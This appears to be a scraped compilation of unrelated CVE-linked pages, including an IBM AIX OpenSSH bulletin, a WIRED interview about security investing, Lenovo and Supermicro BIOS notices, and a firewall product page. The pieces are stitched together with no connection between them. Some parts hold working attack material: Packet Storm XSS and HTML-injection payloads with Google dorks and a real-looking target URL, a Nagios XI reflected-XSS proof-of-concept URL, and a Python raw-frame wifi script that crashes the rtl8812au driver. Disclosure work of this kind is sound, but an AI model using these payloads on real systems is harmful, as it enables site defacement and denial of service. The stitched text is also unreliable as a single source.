IBM AIX 7.2, 7.3, VIOS 3.1's OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls.  IBM X-Force ID:  263476.

**Security Bulletin**

  

**Summary**

Vulnerabilities in AIX's OpenSSH could allow a non-privileged local user file access outside of those allowed (CVE-2023-40371) or allow a remote attacker to execute arbitrary code (CVE-2023-38408). OpenSSH is used by AIX for remote login.

**Vulnerability Details**

**CVEID:**   CVE-2023-40371  
**DESCRIPTION:**   IBM AIX's OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/263476 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-38408  
**DESCRIPTION:**   OpenSSH could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the forwarded ssh-agent. By sending specially crafted requests, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/261022 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.2

AIX

7.3

VIOS

3.1

The following fileset levels are vulnerable:

Fileset

Lower Level

Upper Level

openssh.base.client

8.1.102.0

8.1.102.2106

openssh.base.server

8.1.102.0

8.1.102.2106

openssh.base.client

8.1.112.0

8.1.112.2000

openssh.base.server

8.1.112.0

8.1.112.2000

openssh.base.client

9.2.112.0

9.2.112.2000

openssh.base.server

9.2.112.0

9.2.112.2000

To find out whether the affected filesets are installed on your systems, refer to the lslpp command found in AIX user's guide.

Example:  lslpp -L | grep -i openssh.base.client

**Remediation/Fixes**

**A. FIXES**

IBM strongly recommends addressing the vulnerability now.

AIX and VIOS fixes are available. 

The AIX and VIOS fixes can be downloaded via https from:

https://aix.software.ibm.com/aix/efixes/security/openssh\_fix15.tar 

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

Note that the tar file contains Interim fixes that are based on OpenSSH version, and AIX OpenSSH fixes are cumulative.

You must be on the 'prereq for install' level before applying the interim fix. This may require installing a new level (prereq version) first from:

https://www.ibm.com/resources/mrs/assets?source=aixbp

AIX Level

Interim Fix

Fileset Name (prereq for install)

7.2, 7.3

38408m9a.230811.epkg.Z

openssh.base (8.1.102.2106)

7.2, 7.3

38408m9b.230811.epkg.Z

openssh.base (8.1.112.2000)

7.2, 7.3

38408m9c.230811.epkg.Z

openssh.base (9.2.112.2000)

VIOS Level

Interim Fix

Fileset Name (prereq for install)

3.1

38408m9a.230811.epkg.Z

openssh.base (8.1.102.2106)

3.1

38408m9b.230811.epkg.Z

openssh.base (8.1.112.2000)

3.1

38408m9c.230811.epkg.Z

openssh.base (9.2.112.2000)

To extract the fixes from the tar file:

tar xvf openssh\_fix15.tar

cd openssh\_fix15

Verify you have retrieved the fixes intact:

The checksums below were generated using the "openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

77dbc3b40635e16a2f9dba178727bc3fd5e3321c36823c147eb878250e7f6fd0

38408m9a.230811.epkg.Z

7a4f56811b3dc179916d5b6de337d40775904f2718480d94dc5a97cd92dc4a25

38408m9b.230811.epkg.Z

873adbb99a01500b60729c12bf9a9c18ccf0ac74902cb051d5288eeb4f6ad168

38408m9c.230811.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes.  If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy.         

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

https://aix.software.ibm.com/aix/efixes/security/openssh\_advisory15.asc.sig

**B. FIX AND INTERIM FIX INSTALLATION**

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all  # where fix\_name is the name of the

                                            # fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all  # where fix\_name is the name of the

                                            # fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html

To preview an interim fix installation:

emgr -e ipkg\_name -p         # where ipkg\_name is the name of the

                                         # interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X         # where ipkg\_name is the name of the

                                         # interim fix package being installed.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

23 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2023-40371: Security Bulletin: AIX is vulnerable to unauthorized file access and arbitrary code execution due to OpenSSH (CVE-2023-40371 and CVE-2023-38408)

Musician Alex Pall spoke with WIRED about his VC firm, the importance of raising cybersecurity awareness in a rapidly digitizing world, and his surprise that hackers know how to go hard.

On Saturday, with Hurricane Hilary looming, Alex Pall and Drew Taggart of the DJ duo The Chainsmokers performed a concert at Los Angeles State Historic Park that set an all-time attendance record for the venue. By Tuesday night, Pall was in Switzerland, speaking to WIRED on Zoom, but he had a different recent event on his mind: his and Taggart's first-ever trip earlier this month to the Black Hat security conference in Las Vegas.

On top of being DJs and electronic music producers, The Chainsmokers are also active tech investors. They founded a venture firm, Mantis VC, in 2019 with two other entrepreneurs and now have investments in a broad portfolio of fintech, machine learning, ecommerce, gaming, and healthcare startups. And though Mantis doesn't specifically focus on cybersecurity, the firm is starting to develop a reputation for identifying startups that are attempting to address esoteric yet critical digital security problems.

This morning, for example, the now-independent mobile security app iVerify announced a $4 million seed funding round that Mantis is participating in. The well-regarded app, which grew out of an incubator at the security firm Trail of Bits, aims to take on the mercenary spyware industry by making it easy for people or organizations to scan their iOS and Android devices for suspicious activity and malware. 

How did The Chainsmokers get interested in digital privacy, incident response, software supply chain security, and anti-spyware tools? And how did Pall, a celebrity DJ who performs all over the world, end up partying at Black Hat? He broke it down for us. Our conversation has been lightly edited for length and clarity.

**WIRED: I'm super curious, where does the security and privacy specialization come from?**

**Alex Pall:** I gotta give credit to Saveena \[Mandadi, a Mantis investor and director of operations\] who's definitely the leader of that space for us. She's done a terrific job building out our thesis around the space. But going back a little bit further, you look at our portfolio, and it probably seems a bit out of character for how you would imagine two musicians to be investing their time and money. And that was very much intentional. 

When you're an artist with a platform like ours, you're getting sought out for two things: distribution and marketing—consumer-related brands or creator, economy, and social. But a few years into it, we were reading the news, and you can't help but take a second look at your portfolio and be like, why are we not in companies like Palo Alto Networks and CrowdStrike? And it dawned on us that we were kind of falling victim to the consumer space in a way. We wanted to go out and invest in tools that, behind the scenes, could be the things powering society. And it was also just a challenge at first, like maybe we can be some of the first artists to show what kind of value we could bring outside of the typical ecosystem you'd imagine us investing into.

**Do you feel like you're raising awareness for other investors that security and privacy issues impact everyone's lives and everyone's work?**

People take for granted that if you type in your bank information, it's going to be secure. Or if you log in to your iPhone and send something private to somebody else, that it's not going to end up in the wrong hands. But we had a firsthand experience a number of years ago—our Twitter account got hacked while we were in London. It was a really, really awful experience to have somebody inside your system, speaking like they're you. And obviously, that was just a little taste of the larger consequences that can happen. 

You can easily invest in one really terrible cybersecurity company and say, 'We've made a huge mistake getting into this space.' So I think it's always been the strategy for us to be a part of the best businesses, even if it's not the most exciting work to the average person when you read it on paper. And hopefully, we de-risk it a bit for others by investing in people who are far more experienced than us.

**Why did you want to invest in iVerify? What's important about it and about focusing on the threat of spyware?**

Our phones aren't always as secure as people think, especially for people like journalists and politicians. Mobile device management is obviously a big issue, but there are lots of important people and organizations that probably don't focus enough on it. So it's critical that iVerify is a really powerful but also simple solution.

**What's it been like to connect with the security community? It sometimes has a reputation that it's a group of people who are really tinfoil-hat and hard to interact with or hard to break into.**

There's a lot of pressure on them. Not only do they have to make sure that everything's secure and safe and people are following the guidelines set by an organization, but the pace at which innovation is happening and you're adopting new technologies and bringing new software in—it's a lot of work while still keeping all the customers happy and hoping that the machine doesn't break down. That's a daunting task, and these things are only going to become more and more important as everything becomes more digital. 

In movies, they certainly don't paint \[hackers\] as the outgoing, fun people at the party. They're usually the ones saving the day, which is the truth. So that's something that we've kind of recognized and realized, which is, how do we, through whatever platform we have, bring more awareness to this space and get more people interested and excited about the applications of cybersecurity?

A lot of the time you're dealing with founders who are extremely technical and brilliant, but we all have our shortcomings. I'm not extremely technical or brilliant. So the idea is that we, hopefully, can come together and leverage each others' strengths to accomplish a really challenging goal.

**It sounds like you at least got to have some fun at Black Hat, right?**

We hosted an event at Black Hat for one of the companies we invest in, Chainguard \[which focuses on software supply chain security\]. And they're all wonderful, but I had no idea what kind of crowd we would be drawing on for this. I didn't think everyone was going to be terrible or boring or something, but I was surprised because everyone was awesome. We had a great night out. Eventually, I was like, I've got a show tomorrow, so we can't keep going all night!

**I think security folks are going to be** _**thrilled**_ **to hear that The Chainsmokers had fun partying with them.**

You know, growing up, I was on ClarisWorks pretending I was hacking into things, and I was a big fan of the movie _Hackers._ They were really cool to me. And this stuff is really important. As the world continues to advance with AI technology, we as a society will need more cybersecurity experts. And they deserve more recognition so they can secure all the new things that we're getting excited about. 

We all want to move as fast as possible, but at the end of the day, you can't have this system that's just jerry-rigged together. As new companies spring up and all the code that's being written—you need to have some sort of observability into this in real time to understand where the flaws are. Soon, all of our identities will just be in the metaverse or something. Who knows. So these things become more critical every day.

Why The Chainsmokers Invest in—and Party With—Niche Cybersecurity Companies

A potential vulnerability was discovered in LCFC BIOS for some Lenovo consumer notebook models that could allow a local attacker with elevated privileges to cause some peripherals to work abnormally due to an exposed Embedded Controller (EC) interface.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2022-3746: Lenovo Notebook BIOS Vulnerabilities - Lenovo Support US

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

 ====================================================================================================================================| # Title : G&G Corporate CMS v1.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : http://gegweb.it | | # Dork : intext:Powered by Studio G&G Corporate Communication site:it |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee>Hacked by indoushka</marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

* ActiveX (932)
* Advisory (82,006)
* Arbitrary (16,212)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,282)
* Conference (679)
* Cracker (841)
* CSRF (3,347)
* DoS (23,453)
* Encryption (2,370)
* Exploit (51,952)
* File Inclusion (4,222)
* File Upload (976)
* Firewall (821)
* Info Disclosure (2,785)
* Intrusion Detection (892)
* Java (3,045)
* JavaScript (859)
* Kernel (6,681)
* Local (14,456)
* Magazine (586)
* Overflow (12,693)
* Perl (1,423)
* PHP (5,147)
* Proof of Concept (2,338)
* Protocol (3,602)
* Python (1,535)
* Remote (30,799)
* Root (3,587)
* Rootkit (508)
* Ruby (612)
* Scanner (1,640)
* Security Tool (7,888)
* Shell (3,186)
* Shellcode (1,215)
* Sniffer (894)
* Spoof (2,207)
* SQL Injection (16,383)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (665)
* Vulnerability (31,788)
* Web (9,670)
* Whitepaper (3,750)
* x86 (962)
* XSS (17,953)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,925)
* Debian (6,819)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,504)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,750)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,835)
* UNIX (9,291)
* UnixWare (186)
* Windows (6,574)
* Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

 ====================================================================================================================================| # Title : FreshRSS v1.11.1 Html Inject Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : https://freshrss.org/ |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : <marquee>Hacked by indoushka</marquee>[+] https://demo127.0.0.1/freshrssorg/i/?c=<marquee>Hacked by indoushka</marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================

**File Tags**

* ActiveX (932)
* Advisory (82,006)
* Arbitrary (16,212)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,282)
* Conference (679)
* Cracker (841)
* CSRF (3,347)
* DoS (23,453)
* Encryption (2,370)
* Exploit (51,952)
* File Inclusion (4,222)
* File Upload (976)
* Firewall (821)
* Info Disclosure (2,785)
* Intrusion Detection (892)
* Java (3,045)
* JavaScript (859)
* Kernel (6,681)
* Local (14,456)
* Magazine (586)
* Overflow (12,693)
* Perl (1,423)
* PHP (5,147)
* Proof of Concept (2,338)
* Protocol (3,602)
* Python (1,535)
* Remote (30,799)
* Root (3,587)
* Rootkit (508)
* Ruby (612)
* Scanner (1,640)
* Security Tool (7,888)
* Shell (3,186)
* Shellcode (1,215)
* Sniffer (894)
* Spoof (2,207)
* SQL Injection (16,383)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (665)
* Vulnerability (31,788)
* Web (9,670)
* Whitepaper (3,750)
* x86 (962)
* XSS (17,953)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,925)
* Debian (6,819)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,504)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,750)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,835)
* UNIX (9,291)
* UnixWare (186)
* Windows (6,574)
* Other

FreshRSS 1.11.1 HTML Injection

An issue in all versions of Douran DSGate allows a local authenticated privileged attacker to execute arbitrary code via the debug command.

**Douran Secure Gate**

**Local security and expertise with world-class facilities**

The integrated threat management product (DSGate) has been designed to deal with a variety of network threats and to protect the information and services of the organization. This product offers all the security services required to secure the network in a seamless and efficient manner.

DSGate as a Next Generation Firewall provides the ability to control and manage traffic and prioritize all applications in the Application Layer and it not only makes use of User Identity to control the traffic, but also it uses it in all security and consumer reports. These features, along with other security modules, provide complete transparency in the content exchanged.

DSGate product which is completely local, has been produced after years of research, programming, and empirical work with other top-notch foreign security products by Douran Company. Deploying all these experiences and scenarios and implementing them in DSGate, helped this product to get the maximum satisfaction in terms of product features, sustainability, high processing power as well as support, maintenance and training among the organizations that are using it.

  
  

**فایروال بومی و مدیریت یکپارچه تهدیدات (DSGate)**

**امنیت شبکه و تخصص بومی با امکانات روز جهانی**

محصول مدیریت یکپارچه تهدیدات (DSGate) با هدف مقابله با انواع تهدیدهای شبکه و محافظت از اطلاعات و خدمات سازمان طراحی شده است. این محصول که یک فایروال ایرانی می‌باشد، کلیه سرویس‌های امنیتی مورد‌نیاز برای امن‌سازی شبکه را به صورت یکپارچه و با کارایی بالا ارائه می‌نماید.

دیواره آتش DSGate به عنوان یک Next Generation فایروال توانایی کنترل و مدیریت ترافیک و الویت‌بندی تمامی برنامه‌های کاربردی در لایه Application را ارائه می‌دهد و با استفاده از امکانات User Identity علاوه بر کنترل ترافیک توسط نام کاربری، در تمامی گزارشات امنیتی و مصرفی، از نام کاربری نیز استفاده می‌کند. این امکانات در کنار سایر ماژول‌های امنیتی شفافیت کاملی از محتوای تبادل یافته ارائه می‌دهد.

فایروال بومی DSGate با پشتوانه سال‌ها کار تحقیقاتی و برنامه‌نویسی و کار تجربی با سایر محصولات امنیتی تراز اول خارجی در شرکت داده پردازان دوران تولید گردیده که به کار بستن تمامی این تجربیات و سناریوها و پیاده‌سازی آنها در فایروال بومی DSGate، سبب شده تا این محصول در شرکت‌ها و سازمان‌هایی که نصب شده دارای بالاترین میزان رضایت‌مندی از جهات ویژگی‌های محصول، قابلیت پایداری، بالا بودن میزان توان پردازشی و در نهایت خدمات پشتیبانی، نگهداری و آموزشی محصول باشد.

CVE-2023-38996: ِUTM and Firewall - Douran Group

Cross Site Scripting (XSS) in Nagios XI 5.7.1 allows remote attackers to run arbitrary code via returnUrl parameter in a crafted GET request.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Nagios-XI-Reflected-XSS**

A reflected cross-site scripting (XSS) in Nagios XI 5.7.1 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.

**PoC**

To exploit vulnerability, someone could use a GET request to 'http://\[server\]/includes/components/ccm/' by manipulating 'returnUrl' parameter in the request body to impact users who open a maliciously crafted link or third-party web page.

    http://[server]/includes/components/ccm/?cmd=modify&id=1&page=1&returnUrl=%22%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&type=host

CVE-2020-23992: GitHub - EmreOvunc/Nagios-XI-Reflected-XSS: A reflected cross-site scripting (XSS) in Nagios XI 5.7.1 can result in an attacker performing malicious actions to users who open a maliciously crafted lin

Buffer Overflow vulnerability in Supermicro motherboard X12DPG-QR 1.4b allows local attackers to hijack control flow via manipulation of SmcSecurityEraseSetupVar variable.

Variable Modification Due to Stack Overflow

**Vulnerability Disclosure:**

The purpose of this vulnerability disclosure is to communicate the potential vulnerability affecting Supermicro products that was reported by an external researcher.

**Acknowledgement:**

Supermicro would like to acknowledge the work done by the researcher from Wuhan University, China for discovering a potential vulnerability in the X12DPG-QR motherboard.

**Findings:**

Possible stack overflow occurrence in the BIOS firmware may allow an attacker to exploit this vulnerability by manipulating a variable to potentially hijack the control flow, allowing attackers with the kernel level privileges to escalate their privileges and potentially leading to the execution of arbitrary code.

**CVE:**

*   CVE-2023-34853
*   **Severity**: High

**Affected products:**

Supermicro BIOS in X11, X12, X13, and H11, H12, H13 motherboards.

**Solution:**

All affected Supermicro motherboard SKUs will require a BIOS update to mitigate this potential vulnerability.

An updated BIOS firmware had been created to mitigate this potential vulnerability. Supermicro is currently testing and validating affected products. Please check Release Notes for the resolution.

CVE-2023-34853: Variable Modification Due to Stack Overflow | Supermicro

An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.

**testing environment** 
root@kali:~# uname -r 
5.6.0-kali2-amd64

**poc:** 
\`

#!/usr/bin/env python 
#coding=utf-8 
import time 
import socket

AP\_MAC = "00:22:66:88:22:00" 
STA\_MAC = "00:13:ef:f1:04:ef" 
ETH\_P\_ALL = 3 
IFACE = "wlan0"

def mac2str(mac): 
return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))

RADIO = "\\x00" 
RADIO += "\\x00" 
RADIO += "\\x24\\x00" 
RADIO += "\\x2f\\x40\\x00\\xa0" 
RADIO += "\\x20\\x08\\x00\\x00" 
RADIO += "\\x00\\x00\\x00\\x00" 
RADIO += "\\x27" 
RADIO += "\\x43" 
RADIO += "\\x6e\\x25" 
RADIO += "\\xa0\\x00" 
RADIO += "\\x00\\x00" 
RADIO += "\\x10\\x02" 
RADIO += "\\x6c\\x09" 
RADIO += "\\xa0\\x00" 
RADIO += "\\xd0\\x00" 
RADIO += "\\x00" 
RADIO += "\\x00" 
RADIO += "\\xd0" 
RADIO += "\\x00"

AUTH\_REQ\_OPEN = RADIO + "\\xB0" # Type/Subtype 
AUTH\_REQ\_OPEN += "\\x08" # Flags 
AUTH\_REQ\_OPEN += "\\xc3\\x50" # Duration ID 
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # Desti8nation address 
AUTH\_REQ\_OPEN += mac2str(STA\_MAC) # Source address 
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # BSSID 
AUTH\_REQ\_OPEN += "\\x00\\x00" # Sequence control 
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication algorithm (open) 
AUTH\_REQ\_OPEN += "\\x01\\x00" # Authentication sequence number 
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication status 
AUTH\_REQ\_OPEN += "\\x1f\\xd8" # Authentication status 
AUTH\_REQ\_OPEN += "\\x5a\\x07" # Authentication status 
AUTH\_REQ\_HDR = AUTH\_REQ\_OPEN\[:-6\]

def start\_fuzz(): 
s = socket.socket(socket.AF\_PACKET, socket.SOCK\_RAW, socket.htons(ETH\_P\_ALL)) 
s.bind((IFACE, ETH\_P\_ALL)) 
while True: 
print("send msg:",AUTH\_REQ\_OPEN) 
s.send(AUTH\_REQ\_OPEN)

def main(): 
start\_fuzz()

if **name** == "**main**": 
main() 
\` 
when execute poc, we should turn on monitoring mode： 
ip link set wlan0 down 
iw dev wlan0 set type monitor 
ip link set wlan0 up

**result**

[ 952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [ 952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [ 952.607325] scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [ 952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G OE 5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [ 952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [ 952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [ 952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [ 952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [ 952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [ 952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [ 952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [ 952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [ 952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [ 952.607345] FS: 0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [ 952.607346] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [ 952.607365] Call Trace: [ 952.607395] nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [ 952.607424] rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [ 952.607440] ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [ 952.607454] rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [ 952.607468] join_cmd_hdl+0x267/0x373 [88XXau] [ 952.607476] rtw_cmd_thread+0x295/0x3ed [88XXau] [ 952.607494] kthread+0xf9/0x130 [ 952.607504] ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [ 952.607506] ? kthread_park+0x90/0x90 [ 952.607521] ret_from_fork+0x35/0x40 [ 952.607524] ---[ end trace c0d1960d55eb317c ]---

CVE-2020-26652: fuzzing wifi ,network will down,  result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

There is an open redirect vulnerability in Titan FTP server 19.0 and below. Users are redirected to any target URL.

